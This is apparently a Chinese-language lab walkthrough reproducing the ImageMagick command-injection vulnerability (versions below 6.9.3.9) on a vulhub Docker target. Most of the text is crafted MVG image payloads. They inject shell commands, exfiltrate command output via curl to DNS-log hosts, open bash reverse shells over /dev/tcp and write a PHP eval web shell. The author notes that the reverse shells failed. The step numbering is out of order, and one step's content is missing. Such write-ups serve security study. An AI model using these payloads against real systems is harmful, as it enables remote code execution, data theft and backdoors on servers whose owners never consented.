0x00 實驗環境

攻擊機：Win 10

靶場：docker拉的vulhub靶場

0x01 影響版本

對版本低於6.9.3.9的ImageMagick有影響

0x02 漏洞復現

（1）新建一個圖片，內容為：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|id")'
pop graphic-context

（2）id可更換為不同的命令，通過點選提交查詢即可

（3）靶機開啟監聽：

（5）嘗試使用以下payload均未反彈shell成功：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl `id`.163.kempru.wyzxxz.cn")'
pop graphic-context
 
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|curl xxxxx.dnslog.link/?whoami=`whoami`'
pop graphic-context
 
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context
 
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.net/2015 0>&1")'
 

（4）由於環境限制，導致無法反彈shell，寫shell也存在過濾，故不再過多演示：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|echo "<?php eval($_[pass]);"> /root/1.txt")'
pop graphic-context